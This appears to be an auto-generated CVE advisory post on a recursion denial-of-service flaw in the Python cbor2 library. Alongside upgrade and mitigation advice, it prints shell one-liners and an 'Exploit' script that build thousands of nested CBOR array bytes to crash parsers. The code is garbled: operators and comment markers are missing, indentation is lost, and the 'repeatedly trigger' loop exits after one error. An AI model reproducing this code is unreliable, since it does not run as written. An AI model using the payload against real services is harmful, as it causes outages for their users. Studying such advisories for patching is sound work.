Python cbor2, Denial of Service, CVE-2024-32650 (Medium)

Listen to this Post

The CVE-2024-32650 vulnerability in the cbor2 library arises from uncontrolled recursion during the decoding of deeply nested CBOR structures. The CBORDecoder class, in both the pure Python (decoder.py) and C extension (decoder.c) implementations, uses a recursive algorithm for parsing nested container types like arrays and maps. When the decode_array method processes a crafted payload, it iterates over the specified element count and recursively calls self.decode() for each nested item. This process lacks any built-in depth-tracking mechanism independent of Python’s global recursion limit. The C extension employs Py_EnterRecursiveCall for recursion protection, which raises a RecursionError upon exceeding the interpreter’s limit. However, in many application contexts, this exception remains uncaught, leading to abrupt process termination. An attacker can exploit this by sending a stream of small (<100KB) malicious packets—for example, a payload composed of thousands of nested array start bytes (0x81) followed by a terminal value—to repeatedly crash worker processes faster than they can be restarted, resulting in a sustained denial of service.
Platform: Python cbor2
Version: <=5.6.1
Vulnerability: DoS via Recursion
Severity: Medium
date: 2024-04-19

Prediction: 2024-05-01

Analytics

What Undercode Say:

Simulate depth impact by measuring recursion limit
python3 -c "import sys; print(f'Current recursion limit: {sys.getrecursionlimit()}')"
Generate a deeply nested payload for testing
python3 -c "payload = b'\x81' 2000 + b'\x01'; open('nested.cbor', 'wb').write(payload)"
Monitor for process crashes under load
while true; do cbor2_parser nested.cbor || echo "Process crashed"; done | uniq -c

Exploit:

import cbor2
import sys
Craft a payload with 10,000 nested arrays
DEPTH = 10000
payload = b'\x81' DEPTH + b'\x01'
Repeatedly trigger the crash
while True:
try:
cbor2.loads(payload)
except RecursionError:
print("[!] RecursionError triggered - process may terminate if unhandled")
sys.exit(1)

Protection from this CVE

Upgrade to cbor2 version 5.6.2 or later, where a configurable depth limit is enforced. Alternatively, implement a custom CBOR decoder with explicit recursion depth checking or use a non-recursive parsing approach. In applications parsing untrusted data, wrap decoding calls in a try-except block to catch RecursionError and implement process supervision with automatic restart limits to mitigate worker pool exhaustion.

Impact

Applications using cbor2 to process untrusted CBOR data—such as IoT platforms, WebAuthn/FIDO2 authentication services, and inter-service communication with COSE—are vulnerable to remote denial of service. An unauthenticated attacker can send a small stream of crafted packets to exhaust server worker processes, causing prolonged service unavailability with minimal bandwidth consumption.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top